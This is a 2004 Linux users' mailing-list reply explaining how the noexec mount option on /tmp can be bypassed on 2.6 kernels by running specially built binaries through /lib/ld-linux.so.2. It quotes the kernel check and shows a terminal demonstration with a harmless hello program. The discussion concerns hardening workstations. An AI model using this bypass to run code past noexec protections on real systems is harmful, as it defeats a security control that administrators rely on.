Re: [plug] noexec on /tmp

Sun, 10 Oct 2004 21:28:41 -0700 

> Paolo Alexis Falcone wrote:
>
>>Fortunately though you'd not encounter this if you're using a 2.6
>>kernel. This is what you'll see on a 2.6 kernel:
>>
>
> that's a relief. we're concern about this exploit on the linux
> workstations
> we're going to deploy next month. buti na lang 2.6 din yun kernel ng mga
> yun.
>
>

Had time fiddling this morning. Looking into the kernel sources you can
see this snip in linux/mm/mmap.c
                if ((prot & PROT_EXEC) &&
                    (file->f_vfsmnt->mnt_flags & MNT_NOEXEC))
                        return -EPERM;
but as pointed out with discussions(forgot where) early 2004 it can still
be bypassed using custom binaries with the execute flags removed from the
segments.

The kernel checks for executable segments in the binary and then if it
doesn't find them, PROT_EXEC doesn't get declared; voila the above snip is
circumvented by these special binaries. Unfortunately circumvention works
on 2.6 kernels.

(on 2.6.9-rc3 on /tmp with noexec flags)

[EMAIL PROTECTED] tmp $ ls -la *hello
-rwxr-xr-x  1 xedx users 6965 Oct 11 12:00 ordinaryhello
-rwxr-xr-x  1 xedx users 6965 Oct 11 11:58 specialhello
[EMAIL PROTECTED] tmp $ ./ordinaryhello
-bash: ./ordinaryhello: Permission denied
[EMAIL PROTECTED] tmp $ ./specialhello
-bash: ./specialhello: Permission denied
[EMAIL PROTECTED] tmp $ /lib/ld-linux.so.2 ./ordinaryhello
./ordinaryhello: error while loading shared libraries: ./ordinaryhello:
failed to map segment from shared object: Operation not permitted
[EMAIL PROTECTED] tmp $ /lib/ld-linux.so.2 ./specialhello
Greetings from ed
[EMAIL PROTECTED] tmp $

specialhello binary -> http://i.keepsilent.net/specialhello
ordinaryhello binary -> http://i.keepsilent.net/ordinaryhello
hello.c -> http://i.keepsilent.net/hello.c

sha1sums:
cd12f42e32c9c08b3217aadff511b561b05dadb4  specialhello
5182752ba19e1353b62c81d0db621ea0ca450ca8  ordinaryhello

--
ed [!] http://i.keepsilent.net(stale) [!] propolice[at]gmail[dot]com
Professor at the University of my Living Room Sofa
Senior Researcher of the Kitchen Refrigerator

--
Philippine Linux Users' Group (PLUG) Mailing List
[EMAIL PROTECTED] (#PLUG @ irc.free.net.ph)
Official Website: http://plug.linux.org.ph
Searchable Archives: http://marc.free.net.ph
.
To leave, go to http://lists.q-linux.com/mailman/listinfo/plug
.
Are you a Linux newbie? To join the newbie list, go to
http://lists.q-linux.com/mailman/listinfo/ph-linux-newbie

Reply via email to